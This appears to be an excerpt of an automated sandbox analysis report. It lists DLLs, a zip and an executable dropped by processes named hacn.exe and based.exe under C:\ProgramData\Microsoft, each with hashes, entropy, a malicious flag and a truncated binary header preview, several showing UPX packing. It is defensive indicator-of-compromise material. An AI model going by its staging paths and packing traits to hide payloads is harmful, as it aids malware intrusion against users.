                                                                                                                                                                              SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                                                                                                                                              MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                                                                                                                                              SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                                                                                                                                              SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                                                                                                                                              SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):98224
                                                                                                                                                                              Entropy (8bit):6.452201564717313
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                              MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                              SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                              SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                              SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):83736
                                                                                                                                                                              Entropy (8bit):6.595094797707322
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                                              MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                                              SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                                              SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                                              SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):254744
                                                                                                                                                                              Entropy (8bit):6.564308911485739
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                                                              MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                                                              SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                                                              SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                                                              SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64792
                                                                                                                                                                              Entropy (8bit):6.223467179037751
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                                                              MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                                                              SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                                                              SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                                                              SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):158488
                                                                                                                                                                              Entropy (8bit):6.8491143497239655
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                                                              MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                                                              SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                                                              SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                                                              SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):79128
                                                                                                                                                                              Entropy (8bit):6.284790077237953
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                                                                                              MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                                                                                                              SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                                                                                                              SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                                                                                                              SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):880569
                                                                                                                                                                              Entropy (8bit):5.682993312079324
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                                                                                                                              MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                                                                                                                              SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                                                                                                                              SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                                                                                                                              SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3450648
                                                                                                                                                                              Entropy (8bit):6.098075450035195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                                                                                                              MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                                                                                                              SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                                                                                                              SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                                                                                                              SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4458776
                                                                                                                                                                              Entropy (8bit):6.460390021076921
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                                                                                              MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                                                                                              SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                                                                                              SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                                                                                              SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6361390
                                                                                                                                                                              Entropy (8bit):7.989449982411625
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
                                                                                                                                                                              MD5:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                                                                                                                              SHA1:B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
                                                                                                                                                                              SHA-256:93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
                                                                                                                                                                              SHA-512:541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):29976
                                                                                                                                                                              Entropy (8bit):6.627859470728624
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                                                                                              MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                                                                                              SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                                                                                              SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                                                                                              SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1123608
                                                                                                                                                                              Entropy (8bit):5.3853088605790385
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                                                                                              MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                                                                                              SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                                                                                              SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                                                                                              SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):98224
                                                                                                                                                                              Entropy (8bit):6.452201564717313
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                              MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                              SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                              SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                              SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):48920
                                                                                                                                                                              Entropy (8bit):7.80237293184675
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:4AZgCxM2GXvgErzHwiVGP2lhBHgdcmQYnTYf9WeW/pAHILCVjew5YiSyv3YJPxWb:4A/MZJHzVGPwRHYTiWeWCHILCVjd7SyL
                                                                                                                                                                              MD5:FBA120A94A072459011133DA3A989DB2
                                                                                                                                                                              SHA1:6568B3E9E993C7E993A699505339BBEBB5DB6FB0
                                                                                                                                                                              SHA-256:055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
                                                                                                                                                                              SHA-512:221B5A2A9DE1133E2866B39F493A822060D3FB85F8C844C116F64878B9B112E8085E61D450053D859A63450D1292C13BD7EC38B89FE2DFA6684AC94E090EC3AA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):59672
                                                                                                                                                                              Entropy (8bit):7.815495306851539
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:lAkx+GKRIxcWVGXWYOIDcPiBFCx/YzPILLPDM7SyGPxvI:ikx6uWX3xlBFCRYrILLPDMkxA
                                                                                                                                                                              MD5:31859B9A99A29127C4236968B87DBCBB
                                                                                                                                                                              SHA1:29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5
                                                                                                                                                                              SHA-256:644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
                                                                                                                                                                              SHA-512:FEC3AB9CE032E02C432D714DE0D764AAB83917129A5E6EECA21526B03176DA68DA08024D676BC0032200B2D2652E6D442CA2F1EF710A7408BD198995883A943A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." .............p...........................................@............`.........................................H<.......9.......0..........D............<.......................................%..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):109336
                                                                                                                                                                              Entropy (8bit):7.935778322595252
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
                                                                                                                                                                              MD5:7CDC590AC9B4FFA52C8223823B648E5C
                                                                                                                                                                              SHA1:C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
                                                                                                                                                                              SHA-256:F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
                                                                                                                                                                              SHA-512:919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36120
                                                                                                                                                                              Entropy (8bit):7.666263818459696
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
                                                                                                                                                                              MD5:659A5EFA39A45C204ADA71E1660A7226
                                                                                                                                                                              SHA1:1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
                                                                                                                                                                              SHA-256:B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
                                                                                                                                                                              SHA-512:386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
